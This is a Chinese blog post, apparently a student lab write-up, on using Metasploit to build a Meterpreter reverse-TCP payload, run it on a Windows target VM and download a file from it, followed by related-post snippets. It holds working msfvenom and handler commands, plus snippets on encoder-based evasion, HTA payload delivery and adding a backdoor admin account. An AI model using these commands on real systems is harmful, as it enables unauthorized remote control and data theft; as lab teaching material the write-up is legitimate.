简单远程控制 Metasploit应用

于 2022-11-22 17:24:45 发布
阅读量275 收藏
点赞数 2
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62659165/article/details/127986680
版权

二、Metasploit应用

1、生成主控端、被控端。

2、获得靶机(Windows)控制权。

3、下载靶机上任意一个文件。

P121-123;140-149

在kali中输入命令

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.214.128 lport=5000 -f exe -o /var/payload.exe

在主机中生产攻击荷载payload.exe,这里我选择生成在var目录下

 在kali中输入命令msfconsole打开metasploit

 在依次输入命令use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.214.128

set lport 5000

Exploit

打开攻击模块

再将主机生成的payload.exe拖到靶机上运行(需要提前关闭靶机的防火墙和安全软件)

 在桌面中创建一个文本文档,命名为loudong2

在输入download命令 download loudong2.txt /home/将靶机中loudong2.txe下载到主机home目录中

 最后查看主机home目录找到下载好的loudong2.txt

 

啥都不会2524
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
使用Metasploit 获取远程 shell
Hdvsns的博客
06-23 249
MSF高度模块化,即框架由多个module组成,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。(5)mshta.exe是用于负责解释运行HTA文件的Windows OS实用程序·可以运行javascript或VBScript的HTML文件,在win7靶机中打开cmd窗口。输入命令:mshta.exe http://192.xxx.xx.xx(kali的IP):8888/xxx(hta文件名).hta。Metasploit远程控制模块。
权限维持——Meterpreter后渗透阶段之远程桌面开启
最新发布
wy的博客
11-25 1427
3.靶机中新建一个账号便于我们登录,并给它分配管理员权限(使用),然后将其添加到"远程桌面用户"组中,首先进入shell。4.在kaili中新建一个终端,利用rdesktop对靶机进行远程桌面连接。学习利用Meterpreter后渗透阶段模块来开启靶机远程桌面。5.使用刚创建的用户进行登录:hacker/123123。1.将当前session会话提升到system权限。2.启动目标机的远程桌面协议,对应3389端口。靶机:windows7。
简单远程控制Metasploit应用
qq_61947585的博客
11-21 1139
远程控制 Metasploit应用
记kali下使用metasploit木马进行远程控制
m0_46371267的博客
05-11 1060
环境:ubuntun+kali2020.4 本次实验需要两台虚拟机kali及ubuntun 注:kali地址为192.168.147.137 ubuntun的地址为192.168.147.129 本人使用ssh链接 ssh链接ubuntun 并进入root权限 ssh链接kali 在kali下root权限下生成payload(也就是木马) msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.147.137 LPORT=4444 -
Kali远程控制Windows系统(Metasploit)
热门推荐
董哥的黑板报
06-24 2万+
一、在Kali Linux中生成被控端(msfvenom命令) 第一步:下面我们用msfvenom命令使用反向远程控制程序“windows/meterpreter/reverse_tcp”。该软件执行时自动连接IP“192.168.43.77”,连接的端口为“5000”,生成的文件为payload.exe,在/root目录下 msfvenom -p windows/meterpreter/re...
Python实现远程调用MetaSploit的方法
12-23
本文较为详细的讲述了Python实现远程调用MetaSploit的方法,对Python的学习来说有很好的参考价值。具体实现方法如下: (1)安装Python的msgpack类库,MSF官方文档中的数据序列化标准就是参照msgpack。 root@kali:...
metasploit
12-19
后渗透的多种方法,meterpreter 在获取shell之后,如何持续控制目标主机,即在目标主机重启或下次开机后能自动连接到攻击主机上,不必每次都需要进行攻击取得 meterpreter。
Metasploit 中文手册.pdf
06-27
Metasploit软件帮助安全专家和 IT 专家识别安全问题、验证漏洞修复情况,并管理由专家执行的安全评估。 该产品提供真正的安全风险智能,帮助用户保护数据抵御攻击。 本 POC 指南的内容涉及智能入侵测定、密码审计、...
Metasploit教程
06-07
Metasploit教程Metasploit教程Metasploit教程Metasploit教程
metasploitframework框架
09-28
metasploit-framework-V6.1.8适用于Windows系统。 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
kali metasploit 制作后门程序远程操控基本使用方法
qq_51685718的博客
12-03 3958
kali metasploit制作后门程序远程操控基本使用方法 1.后门程序的制作与加密 后门的实质就是木马 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.34.53 lport=10000 -f exe -o biyu.exe lhost后面加的是本机ip,lport后面加的是想要打开的端口号 执行后会在本地生成一个biyu.exe的文件 如果直接上传到win系统会被杀毒软件杀掉,我们可以用自己的电脑对其进行一个加壳操作。 下
Metasploit——客户端渗透
m0_62063669的博客
08-10 1156
2.社会工程学:骗取敏感信息,诱使目标执行含有漏洞利用代码的DOC、PDF等Payload。生成这个payload,就要生成一个安卓系统上可用的安装包文件,比如说一个.apk的安装包。目标访问恶意网站,漏洞利用代码会执行,进一步执行payload,然后反弹shell。在创建的宏里粘入Payload第一部分的VBA代码。1.含有漏洞利用代码的WEB站点:利用客户端漏洞。只要目标客户端执行制作的exe文件,就可获得目标shell。由Jjiktezjhl到最后。4. 利用Flash漏洞执行payload。....
渗透测试之Metasploit
11-20
本套教程,我们将为大家详细讲解Metasploit的使用方法。Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。
Python 远程调用MetaSploit
某熊的技术之路
08-21 4168
(1)安装Python的msgpack类库,MSF官方文档中的数据序列化标准就是参照msgpack。 root@kali:~# apt-get install python-setuptools root@kali:~# easy_install msgpack-python   (2)创建createdb_sql.txt: create database msf; create us
Metasploit远程代码执行
小飞鸟
11-02 999
Metasploit之远程代码执行 本次漏洞利用的是ms08-067的XP漏洞 metasploit下进行操作 search 08-067            -->搜索漏洞相关的模块,得到exploit/windows/smb/ms08_067_netapi use exploit/windows/smb/ms08_067_netapi        -->使用这个漏洞模块...
kali攻防第9章 Metasploit之我的远程控制软件
安全参透之旅
12-07 1万+
准备工具 1、KALI系统 IP 10.10.10.131 2、受害系统 IP 10.10.10.133     步骤: 1、生成木马控制程序 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.10.10.131 LPORT=44
kali metasploit 远程控制Windows
天码行空的码的博客
07-08 2188
一、在kali中生成被控制端程序 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.88.188 LPORT=5901 -f exe > test.exe #生成Windows端 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.88.188 LPORT=5555 R
Metasploit利用vnc图形化远程控制工具获得靶机远程控制桌面
m0_46161993的博客
07-01 5165
问题描述   分别在Windows和Linux操作系统上安装Metasploit软件,并运行Metasploit完成针对Linux靶机usermap_script漏洞的渗透攻击,尝试使用植入VNC图形化远程控制工具的攻击载荷,成功获得Linux靶机上的远程控制桌面。   由于笔者没有配置Linux虚拟机,因此使用Windows XP SP3中文版作为靶机,并使用ms08_067作为渗透模块进行渗透。 解决办法 在msfconsole中使用命令: use exploit/windows/smb/ms08_06
metasploit应用
09-11
Metasploit应用包括: 1. 漏洞评估:Metasploit可以帮助安全团队评估系统中存在的漏洞,并验证其是否可以被利用。通过使用Metasploit框架提供的模块,可以自动化执行漏洞扫描和漏洞利用过程。 2. 渗透测试:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值